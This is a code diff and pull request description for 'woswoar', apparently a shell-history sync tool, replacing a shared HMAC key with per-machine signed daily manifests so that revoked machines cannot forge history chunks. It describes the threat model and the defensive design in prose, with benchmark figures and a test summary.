+    # each iteration cost an `ssh-keygen -Y verify` plus a full walk of every
+    # chunk directory -- on a timer firing once a minute, over a year of logs,
+    # that turned a no-op sync from 0.04 s into nearly 3 s and grew with the
+    # archive forever.
+    fresh: dict[str, list[tuple[str, bytes, int]]] = {}
     for log in store.iter_log_files():
         if log.host_id != known.id:
             continue  # other hosts' logs arrived decrypted; never re-export them
         data, new_offset = store.read_tail(log.path, state.exported.get(log.relpath, 0))
-        if not data:
+        if data:
+            fresh.setdefault(store.day_of_log(log.relpath), []).append(
+                (log.relpath, data, new_offset)
+            )
+
+    if not fresh:
+        return
+
+    # One pass for the whole host, not one per day.
+    on_disk: dict[str, set[str]] = {}
+    for chunk in store.iter_chunks(known.id):
+        on_disk.setdefault(chunk.day, set()).add(chunk.name)
+
+    for day, tails in sorted(fresh.items()):
+        # What this machine has already put its name to for this day. Extended,
+        # never rebuilt from the directory -- see the docstring.
+        listed = read_manifest(known.id, day, verify_key)
+        if not listed and store.day_manifest(known.id, day).exists():
+            # There is a manifest for this day and this machine cannot verify
+            # it, so it cannot tell what it has already published. Signing a
+            # fresh one would silently drop every earlier chunk of that day from
+            # the signed list and every peer would then refuse them -- losing
+            # published history to a file somebody else was able to corrupt.
+            # Nothing is written for this day, and it is reported.
+            report.unsignable.add(day)
             continue
 
-        day = store.day_of_log(log.relpath)
-        sealed = crypto.encrypt_to(pack(data), day_public_key(known, day))
-        chunk = store.new_chunk(known.id, day, now)
-        store.write_atomic(chunk, store.frame_chunk(sealed, crypto.tag(mac, sealed)))
+        for relpath, data, new_offset in tails:
+            sealed = crypto.encrypt_to(pack(data), day_public_key(known, day))
+            written = store.new_chunk(known.id, day, now)
+            store.write_atomic(written, sealed)
+            listed[written.name] = digest_of(sealed)
 
-        state.exported[log.relpath] = new_offset
-        report.chunks_written += 1
-        report.lines_exported += data.count(b"\n")
+            state.exported[relpath] = new_offset
+            report.chunks_written += 1
+            report.lines_exported += data.count(b"\n")
+
+        write_manifest(known, day, listed)
+
+        # A chunk under this host's own id that this host never wrote. `merge`
+        # skips our own id, so nothing else would ever look at it, and peers
+        # would take it for ours. It is left on disk and unsigned rather than
+        # deleted -- deleting evidence is not this command's job -- but it is
+        # said out loud, because it means someone else can write here.
+        #
+        # Only for days this sync touched: checking every day would mean reading
+        # every manifest, which is the cost this loop exists to avoid. A planted
+        # chunk on a quiet day is refused by peers either way, because it is in
+        # no manifest -- this is a report, not the defence.
+        report.foreign |= {f"{day}/{name}" for name in on_disk.get(day, set()) - set(listed)}
 
 
 # ---------------------------------------------------------------------------
@@ -502,40 +903,78 @@ def export(known: Machine, state: State, report: Report, now: int, mac: bytes) -
 # ---------------------------------------------------------------------------
 
 
-def merge(known: Machine, state: State, report: Report, mac: bytes) -> None:
+def merge(known: Machine, state: State, report: Report) -> None:
     """Decrypt every chunk from other hosts that we have not merged yet."""
     for host_id in store.repo_hosts():
         if host_id == known.id:
             continue  # our own plaintext is already the source of truth
         report.hosts_seen.add(host_id)
-        _merge_host(known, host_id, state, report, mac)
+        _merge_host(known, host_id, state, report)
         _merge_name(known, host_id)
 
 
-def open_chunk(path: Path, mac: bytes) -> bytes:
-    """A chunk's sealed bytes, or :class:`ValueError` if it is not authentic.
+def open_chunk(path: Path, expected: str) -> bytes:
+    """A chunk's sealed bytes, or :class:`ValueError` if they are not the ones
+    the host's signed manifest names.
 
-    The *only* way to read a chunk. `store.split_chunk` merely slices the frame
-    apart and leaves "and now check the tag" to the caller, which is a choice no
-    caller should get: `compact` took the other branch and became a laundering
-    path -- it re-sealed and re-tagged whatever it found under this host's own
-    id, which `merge` never inspects, turning a planted chunk into one every
-    peer would believe, and then deleted the evidence. Verification lives here
-    so that "read a chunk without checking it" is not expressible.
+    The *only* way to read a chunk. Verification lives here so that "read a
+    chunk without checking it" is not expressible: `compact` once took the other
+    branch and became a laundering path -- it re-sealed and re-tagged whatever
+    it found under this host's own id, which `merge` never inspects, turning a
+    planted chunk into one every peer would believe, and then deleted the
+    evidence.
+
+    The digest, not a tag: what makes the bytes trustworthy is that a signature
+    by one specific machine covers this digest. A shared tag could be produced
+    by anyone who could check it, which is what made a revoked machine able to
+    keep publishing (#38).
     """
-    sealed, tag = store.split_chunk(path.read_bytes())
-    if not crypto.tag_matches(mac, sealed, tag):
-        raise ValueError(f"{path.name} failed authentication")
-    return sealed
+    blob = path.read_bytes()
+    if digest_of(blob) != expected:
+        raise ValueError(f"{path.name} is not the chunk its manifest names")
+    return blob
 
 
-def _merge_host(known: Machine, host_id: str, state: State, report: Report, mac: bytes) -> None:
+def _trusted_signer(host_id: str, state: State, report: Report) -> str | None:
+    """The key this machine accepts ``host_id``'s history under, if any.
+
+    Three answers, and only one of them proceeds:
+
+    - pinned, and the repo still shows the same key: go ahead;
+    - pinned, and the repo now shows a different one: refuse and say so, never
+      re-pin. It is either a re-enrolled machine or someone rewriting the repo,
+      and nothing available here can tell those apart;
+    - not pinned: refuse and say so. This is what a machine enrolled since this
+      one last looked is *supposed* to look like, so it is reported as a state
+      to resolve rather than as an attack.
+    """
+    pinned = state.signers.get(host_id)
+    if pinned is None:
+        report.untrusted.add(host_id)
+        return None
+
+    published = read_signer(host_id)
+    if published and published.verify_key != pinned:
+        report.changed_signer.add(host_id)
+        return None
+    return pinned
+
+
+def _merge_host(known: Machine, host_id: str, state: State, report: Report) -> None:
+    verify_key = _trusted_signer(host_id, state, report)
+    if verify_key is None:
+        return
+
     #: None marks a day whose key we already failed to open. Caching the failure
     #: matters as much as caching the success: without it, a machine that has
     #: not been granted access yet retries the same doomed `age -d` once per
     #: chunk rather than once per day -- tens of thousands of subprocess spawns
     #: instead of hundreds, on precisely the first sync a new machine runs.
     day_keys: dict[str, str | None] = {}
+    #: Likewise for manifests, which cost a subprocess each. One per day rather
+    #: than one per chunk is the whole reason signatures are affordable here:
+    #: over a year of three machines that is ~3.6 s against nearly two minutes.
+    manifests: dict[str, dict[str, str]] = {}
     pending: dict[str, list[bytes]] = {}
 
     for chunk in store.iter_chunks(host_id):
@@ -543,6 +982,16 @@ def _merge_host(known: Machine, host_id: str, state: State, report: Report, mac:
         # Chunk names are zero-padded timestamps, so "newer than the watermark"
         # is a plain string comparison.
         if chunk.name <= state.merged.get(key, ""):
+            continue
+
+        if chunk.day not in manifests:
+            manifests[chunk.day] = read_manifest(host_id, chunk.day, verify_key)
+        listed = manifests[chunk.day]
+        if chunk.name not in listed:
+            # No signed statement that this host wrote this. Covers a missing,
+            # unsigned, mis-signed or mis-addressed manifest as well as a chunk
+            # simply absent from a good one -- see `Report.unauthenticated`.
+            report.unauthenticated.add(key)
             continue
 
         if chunk.day not in day_keys:
@@ -561,20 +1010,14 @@ def _merge_host(known: Machine, host_id: str, state: State, report: Report, mac:
 
         # Authenticated before it is decrypted or decompressed, so age, zlib and
         # the parser only ever see bytes one of this user's own machines wrote.
-        # Deliberately *below* the day-key bail above rather than before it: a
-        # day whose key cannot be opened never advances the watermark, so its
-        # chunks come round on every sync, and this runs from a one-minute
-        # timer. Opening a day key touches no chunk bytes, so nothing is
-        # decrypted any earlier for being ordered this way.
         try:
-            blob = open_chunk(chunk.path, mac)
+            blob = open_chunk(chunk.path, listed[chunk.name])
         except (OSError, ValueError):
             report.unauthenticated.add(key)
             continue
 
         try:
-            sealed = crypto.decrypt_with_secret(blob, secret)
-            plaintext = unpack(sealed)
+            plaintext = unpack(crypto.decrypt_with_secret(blob, secret))
         except (crypto.AgeError, zlib.error, OSError):
             # Same judgement as an unopenable day key above: a chunk we cannot
             # consume -- damaged, or written by a woswoar that packs it some
@@ -623,6 +1066,7 @@ def _merge_name(known: Machine, host_id: str) -> None:
 def run(push: bool = True, now: int | None = None) -> Report:
     """Export, exchange with the remote, import. Safe to run concurrently."""
     crypto.require()
+    crypto.require_signing()
     if not is_repo():
         raise SyncError("no history repo yet; run 'woswoar init' first")
 
@@ -645,35 +1089,27 @@ def run(push: bool = True, now: int | None = None) -> Report:
         if remote:
             _fetch_and_rebase()
 
-        # Opened once per sync, before anything uses it. A machine enrolled
-        # since the last `grant` cannot open it, which is the same state -- and
-        # has the same remedy -- as history it cannot decrypt, so it is reported
-        # that way rather than as a distinct kind of failure.
-        try:
-            mac = mac_key(known)
-        except crypto.AgeError:
-            # Enrolled, but nobody has run `grant` yet, so this machine holds no
-            # key it can tag or check with. Reported rather than raised: the
-            # shell hook keeps recording into logs/, the backlog exports whole
-            # on the first sync after `grant`, and a timer firing every minute
-            # must not turn a normal waiting state into a stream of failures.
-            #
-            # Which of the two states this is decides the advice, so it is
-            # settled here rather than left to the caller: "ask someone to run
-            # grant" is exactly wrong for a machine that was revoked, and it is
-            # the message that machine would see forever.
-            report.needs_grant = True
-            report.revoked = _this_machine_revoked(known)
-            return report
+        # Before anything is trusted, and only ever subtracting -- see
+        # `apply_withdrawals`.
+        apply_withdrawals(state, report)
 
-        export(known, state, report, int(time.time()) if now is None else now, mac)
+        # Publishing needs no permission from anyone: this machine signs with a
+        # key of its own and seals to a day key it mints itself. Only *reading*
+        # waits for `grant`. That is a change from the shared-key design, where
+        # a machine nobody had granted access to could not tag a chunk either,
+        # so its own history piled up locally until someone else acted.
+        report.revoked = _this_machine_revoked(known)
+        if not report.revoked:
+            publish_signer(known)
+            export(known, state, report, int(time.time()) if now is None else now)
+
         _commit()
 
         if remote:
             _push()
             report.pushed = True
 
-        merge(known, state, report, mac)
+        merge(known, state, report)
         state.save()
 
     return report
@@ -797,9 +1233,16 @@ def initialise(
     remote: str | None = None,
     new_identity: bool = False,
     identity: Path | None = None,
-) -> tuple[Machine, Path]:
-    """Create or clone the history repo and enrol this machine in it."""
+) -> tuple[Machine, Path, list[str]]:
+    """Create or clone the history repo and enrol this machine in it.
+
+    Returns the pinned verify keys alongside the machine and its identity,
+    because trust on first use is the sharpest edge in the design and the only
+    guard against a repository that lied at exactly this moment is a human
+    reading what was accepted. A caller that cannot show it cannot warn.
+    """
     crypto.require()
+    crypto.require_signing()
 
     chosen = choose_identity(new_identity=new_identity, explicit=identity)
     known = store.machine()._replace(identity=str(chosen))
@@ -827,12 +1270,21 @@ def initialise(
     if _write_repo_metadata(known, chosen):
         _commit()
 
-    # After the recipient list exists, so the key is sealed to a list that
-    # includes this machine. On a repo that already has one this does nothing;
-    # opening it is `grant`'s job, not enrolment's.
-    if not store.mac_key_file().is_file():
-        create_mac_key(known)
-        _commit()
+    # Trust on first use, and only here. Every host already in the repo when
+    # this machine cloned is pinned: the user named the remote, and at this
+    # moment there is nothing to tell one host in it from another. From now on a
+    # host that appears is refused until a human here runs `woswoar trust`.
+    #
+    # The pinned set is printed by `init`, because this is the sharpest edge in
+    # the design and silence would make it invisible.
+    state = State.load()
+    pinned: list[str] = []
+    for host_id in store.repo_hosts():
+        signer = read_signer(host_id)
+        if signer is not None and host_id not in state.signers:
+            state.signers[host_id] = signer.verify_key
+            pinned.append(signer.verify_key)
+    state.save()
 
     # Publish immediately. Until this machine's public key is on the remote,
     # `grant` run elsewhere cannot include it, so onboarding would appear to
@@ -840,7 +1292,7 @@ def initialise(
     if publishing:
         _push()
 
-    return known, chosen
+    return known, chosen, pinned
 
 
 def _write_repo_metadata(known: Machine, identity: Path) -> bool:
@@ -853,7 +1305,13 @@ def _write_repo_metadata(known: Machine, identity: Path) -> bool:
         store.write_atomic(attrs, store.GITATTRIBUTES_CONTENT.encode("utf-8"))
         changed = True
 
-    if add_recipient(crypto.recipient_for(identity), label=known.name):
+    recipient = crypto.recipient_for(identity).strip()
+    if add_recipient(recipient, label=known.name):
+        changed = True
+
+    # Published before the first chunk is, so a peer that fetches between
+    # enrolment and the first sync sees a host it can already be asked about.
+    if publish_signer(known):
         changed = True
 
     seal = store.name_seal(known.id)
@@ -1012,10 +1470,10 @@ def _reseal(identity: Path, keys: list[str]) -> tuple[int, int]:
     -- if a machine nobody had granted access to could re-seal old keys, the
     encryption would not be worth anything.
     """
-    # The repo key first: it is what a newly enrolled machine needs before it
-    # can authenticate anything at all, and unlike the per-host keys there is
-    # exactly one of it.
-    sealed = [store.mac_key_file()]
+    # Only what is sealed *to the recipients* is here. Signing keys are not:
+    # nobody but the machine that made one ever needs it, which is exactly why a
+    # revoked machine keeping its copy buys it nothing.
+    sealed: list[Path] = []
     for host_id in store.repo_hosts():
         sealed.extend(store.iter_day_keys(host_id))
         sealed.append(store.name_seal(host_id))
@@ -1218,10 +1676,11 @@ def compact(before: str) -> tuple[int, int]:
     Returns (days compacted, chunks replaced).
     """
     crypto.require()
+    crypto.require_signing()
     known = store.machine()
 
     with lock():
-        mac = mac_key(known)
+        verify_key = signing_public()
         by_day: dict[str, list[store.Chunk]] = {}
         for chunk in store.iter_chunks(known.id):
             if chunk.day < before:
@@ -1233,27 +1692,40 @@ def compact(before: str) -> tuple[int, int]:
             if len(chunks) < 2:
                 continue
             secret = open_day_key(known, known.id, day)
-            # Authenticated before it is re-sealed, and fatally so. Compaction
-            # rewrites chunks under a fresh tag, so anything it accepts here it
-            # launders into something every other machine will believe -- and it
-            # then deletes the original. `merge` skips this host's own id, so
-            # this is the *only* time these chunks are ever checked.
+
+            # Checked against what this machine *signed*, and fatally so.
+            # Compaction re-signs what it merges and then deletes the original,
+            # so anything it accepts here it launders into something every peer
+            # believes. `merge` skips this host's own id, so this and `export`
+            # are the only places these chunks are ever looked at.
+            #
+            # Stronger than the tag this replaced: a tag proved only that
+            # *someone* enrolled had written it, which a revoked machine could
+            # still forge. A signature proves this machine wrote it.
+            listed = read_manifest(known.id, day, verify_key)
+            if {chunk.name for chunk in chunks} - set(listed):
+                raise SyncError(
+                    f"refusing to compact {day}: it holds chunks this machine never "
+                    "published, or its manifest is not one this machine signed.\n"
+                    "Compaction re-signs what it merges, so it must not be used to "
+                    "launder a chunk this machine did not write."
+                )
             try:
                 plain = b"".join(
-                    unpack(crypto.decrypt_with_secret(open_chunk(c.path, mac), secret))
+                    unpack(crypto.decrypt_with_secret(open_chunk(c.path, listed[c.name]), secret))
                     for c in chunks
                 )
             except ValueError as exc:
-                raise SyncError(
-                    f"refusing to compact {day}: {exc}.\n"
-                    "Compaction re-tags what it merges, so it must not be used to "
-                    "launder a chunk this machine did not write."
-                ) from exc
+                raise SyncError(f"refusing to compact {day}: {exc}") from exc
+
             merged = store.new_chunk(known.id, day, int(chunks[-1].name.split("-")[0]))
             sealed = crypto.encrypt_to(pack(plain), crypto.public_of(secret))
-            store.write_atomic(merged, store.frame_chunk(sealed, crypto.tag(mac, sealed)))
+            store.write_atomic(merged, sealed)
             for chunk in chunks:
                 chunk.path.unlink()
+                del listed[chunk.name]
+            listed[merged.name] = digest_of(sealed)
+            write_manifest(known, day, listed)
             days += 1
             replaced += len(chunks)
 


### PR DESCRIPTION
Fixes #38.

## The hole

Chunk authentication rested on one HMAC key in `history/mac.age`, sealed to every recipient. Any machine ever enrolled kept those 32 bytes forever — so a machine you had **revoked** could seal a chunk to a published day key, tag it, push, and every machine would accept it and offer it in Ctrl-R. Exactly the attack the tag was added in #29 to stop.

**No shared secret can fix that**: whoever can check a tag can forge one. I traced three variants before accepting that, and the third is the interesting one:

| Variant | How a revoked machine defeats it |
|---|---|
| Per-host MAC sealed to recipients | It opened every host's key before revocation |
| MAC derived from the day key | It *mints* its own day keys, so it knows the secret before sealing it |
| Epoch key rotated on revoke | Nothing authenticates which epoch a day belongs to; it claims the old one |

Rotating the shared key is worse still: every existing chunk fails, and a fresh clone refuses the whole archive.

## The fix

Each machine signs with an Ed25519 key that never leaves it. Per day it signs a **manifest** — the chunks it published and their digests — and a chunk is opened only if the manifest of the host whose directory it sits in vouches for exactly those bytes. Chunks go back to being plain age files with no prefix, which is what `docs/woswoar_design_summary.md` always claimed they were.

**Per day, not per chunk**, and that is what makes this affordable where PR #28 was not. #28 signed each chunk at 3.3 ms, so a machine waiting for `grant` re-checked the archive every timer tick and never finished. Measured here on the real code path:

| | a year, 3 hosts, 35k chunks |
|---|---|
| #28, per chunk | **108.6 s** (rejected) |
| this, per host-day | **3.40 s** |
| steady state | 10 ms |

#28's other blocker was narrower than recorded: `-Y sign` reads stdin and writes to stdout, and `-Y verify` takes *both* allowed-signers and signature on `/dev/fd/N` pipes. So verification needs no temp file and no path at all, and only signing names one — woswoar's own 0600 key in its own config dir. The "never hand a tool a path" rule survives.

## Trust

Pinned locally, per machine, because the repository is exactly what it defends against. The rule that makes it cheap:

> **Repo state may only ever remove trust, never add it.**

Adding needs a person there (`woswoar trust`, which writes nothing to the repo). Removing is automatic — it can only ever cause a refusal, never an injection — so `revoke` stops a machine publishing fleet-wide with nobody having to run anything.

**The cost, stated in README and docs:** enrolling a machine now needs `woswoar trust` on each machine that will read it. A machine that clones later pins what it finds, so the ceremony runs in one direction only. This is what #28 was rejected for; it is accepted deliberately now that `revoke` exists to carry the other half.

## Two things I had wrong, caught by review

- **`export` must extend the manifest it last signed, never list the day's directory.** `merge` skips this host's own id, so a chunk planted under it is the one thing nothing inspects — listing would have swept it into a manifest *we sign*, laundering it with no `compact` needed. Strictly worse than the hazard `open_chunk` was written to guard.
- **A day whose own manifest will not verify is left alone**, not re-signed from scratch, which would silently disown everything published earlier that day.

Also fixed here, found by review: `export` was iterating **every day of history** each sync — an `ssh-keygen` verify plus a full chunk walk per day — turning a no-op sync on a year of logs from 0.04 s into ~3 s, on a one-minute timer. Now 0.01 s. And `TestImmutability` filtered to `*.age` *before* its allowlist ran, so any rewritten non-chunk file was invisible to an assertion that reads like it covers the tree.

`needs_grant` is gone: publishing needs nothing from anyone now, so a freshly enrolled machine publishes from its first sync and only *reading* waits for `grant`.

## Format break

No upgrade path, same as #29. On every machine: `rm -rf ~/.local/share/woswoar/history ~/.local/share/woswoar/state.json`, then `woswoar init <url>`, `woswoar grant` once, and `woswoar trust` on each machine. `logs/` is the source of truth and is untouched.

## Tests

268 pass. 13 mutations, all killing their guarding test — two rounds needed, and both misses were mine rather than the tests'. The headline one drives three real machines through a bare repo: beta is revoked, then publishes a **correctly signed** chunk anyway (bypassing its own revoked check), under its own id and under alpha's — and gamma accepts neither, while keeping what beta published before.

`ssh-keygen` becomes a required dependency for sync, with a per-distro package mapping (`openssh-client` / `openssh-clients`) — the mapping `deps.Tool.name`'s comment always promised would appear.